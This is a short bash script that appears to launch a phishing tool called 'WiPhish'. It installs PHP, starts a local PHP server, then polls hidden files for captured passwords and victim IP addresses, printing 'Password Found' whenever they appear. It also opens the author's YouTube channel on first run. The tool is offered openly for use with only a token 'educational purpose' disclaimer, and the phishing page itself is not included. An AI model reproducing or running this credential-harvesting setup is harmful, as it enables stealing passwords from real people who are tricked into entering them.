#!/bin/bash

rd="\e[1;31m"
gr="\e[1;32m"
yl="\e[1;33m"
cy="\e[1;36m"
wht="\e[0m"

banner(){

echo -e ${gr}

echo -e "       _  _  _ _ ${rd}______  _     _      _     ${gr}"
echo -e "      (_)(_)(_|_${rd}|_____ \| |   (_)    | |    ${gr}"
echo -e "       _  _  _ _${rd} _____) ) |__  _  ___| |__  ${gr}"
echo -e "      | || || | ${rd}|  ____/|  _ \| |/___)  _ \ ${gr}"
echo -e "      | || || | ${rd}| |     | | | | |___ | | | |${gr}"
echo -e "       \_____/|_${rd}|_|     |_| |_|_(___/|_| |_|${gr}"
echo
echo -e "${gr}      --------------------------------------"
echo -e "${rd}  -----          ${wht}- By: Mr Idealhat         ${rd}-----"
echo -e "${gr}      --------------------------------------"
echo

echo -e "${yl}NOTE: ${rd}Use this tool only for educational purpose!"

}


depend(){

    if [ ! -d .server ]; then
	mkdir .server
    fi

    if [ -f .server/pass.txt ]; then
	rm .server/pass.txt
    fi

    if [ -f .server/ip.txt ]; then
	rm .server/ip.txt
    fi

    if [ ! -f $PREFIX/bin/php ]; then
	echo -e "${rd}[${yl}!${rd}] ${gr}Installing dependency...!"
	apt-get install php -y
	clear
	setup
    fi

}


check_pass(){

    if [ -f .server/pass.txt ]; then
	echo -e "\n${rd}[${yl}!${rd}] ${gr}IP Address: ${wht}$( cat .server/ip.txt )\n"
	echo -e "${rd}[${yl}!${rd}] ${gr}Password Found: ${wht}$( cat .server/pass.txt )\n"
	setup
    else
	sleep 1
	check_pass
    fi

}


setup(){
    depend
    echo
    echo -e "${rd}[${gr}!${rd}] ${gr}Waiting for credentials...!!!\n"
    check_pass
}

if [ ! -f .open.txt ]; then
    xdg-open https://www.youtube.com/@MrIdealhat
    echo "Visit https://youtube.com/@mridealhat" > .open.txt
fi

home(){

    banner
    echo
    echo -e "${rd}[${gr}!${rd}] ${gr}Starting PHP Server\n"
    sleep 2
    php -S localhost:8888 > /dev/null 2>&1 &
    sleep 4
    clear

}

home
banner
echo
echo -e "${rd}[${gr}!${rd}] ${gr}URL: ${yl}http://localhost:8888\n"
setup
